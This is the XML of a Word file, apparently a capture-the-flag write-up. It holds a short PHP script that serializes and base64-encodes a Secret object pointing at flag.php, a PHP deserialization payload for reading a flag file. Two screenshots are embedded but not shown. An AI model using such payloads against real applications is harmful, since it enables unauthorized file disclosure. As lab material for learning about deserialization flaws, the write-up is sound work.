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9E79F" w14:textId="77777777" w:rsidR="0031762E" w:rsidRPr="0031762E" w:rsidRDefault="0031762E" w:rsidP="0031762E">
      <w:r w:rsidRPr="0031762E">
        <w:t>&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0031762E">
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0031762E">
        <w:br/>
        <w:t>class Secret {</w:t>
      </w:r>
      <w:r w:rsidRPr="0031762E">
        <w:br/>
        <w:t xml:space="preserve">    private $filename = '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0031762E">
        <w:t>flag.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0031762E">
        <w:t>';</w:t>
      </w:r>
      <w:r w:rsidRPr="0031762E">
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="0031762E">
        <w:br/>
        <w:t xml:space="preserve">$obj = new </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0031762E">
        <w:t>Secret(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0031762E">
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="0031762E">
        <w:br/>
        <w:t>$payload = base64_encode(serialize($obj));</w:t>
      </w:r>
      <w:r w:rsidRPr="0031762E">
        <w:br/>
        <w:t>echo $payload;</w:t>
      </w:r>
      <w:r w:rsidRPr="0031762E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0031762E">
        <w:br/>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65398A52" w14:textId="77777777" w:rsidR="0031762E" w:rsidRPr="0031762E" w:rsidRDefault="0031762E"/>
    <w:p w14:paraId="7AEF77CC" w14:textId="683815B5" w:rsidR="00567B15" w:rsidRDefault="0031762E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0031762E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D98C320" wp14:editId="1E390DE9">
            <wp:extent cx="5274310" cy="779145"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="553442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42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9792" w14:textId="4D46F191" w:rsidR="00567B15" w:rsidRDefault="007A3A7F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A3A7F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35AE1F45" wp14:editId="2E307EE8">
            <wp:extent cx="5274310" cy="852170"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="1449015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15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AF"/>
    <w:rsid w:val="00065AAF"/>
    <w:rsid w:val="0009204A"/>
    <w:rsid w:val="000C412A"/>
    <w:rsid w:val="00280F85"/>
    <w:rsid w:val="0031762E"/>
    <w:rsid w:val="00366CC7"/>
    <w:rsid w:val="00567B15"/>
    <w:rsid w:val="005D4495"/>
    <w:rsid w:val="007A3A7F"/>
    <w:rsid w:val="008A5C04"/>
    <w:rsid w:val="008A6BB9"/>
    <w:rsid w:val="00CA1913"/>
    <w:rsid w:val="00EA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7326"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{02B82244-4066-4B3F-9BDF-116309D6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5A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5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5AA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5AA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AA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5AA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5AA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5AA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5A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5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5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5AA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5AA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5AA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5A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5A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5A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5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5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5A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5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5A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5A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5A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5A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5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5A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5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obrine him</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>obrine him</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-22T03:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-22T03:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>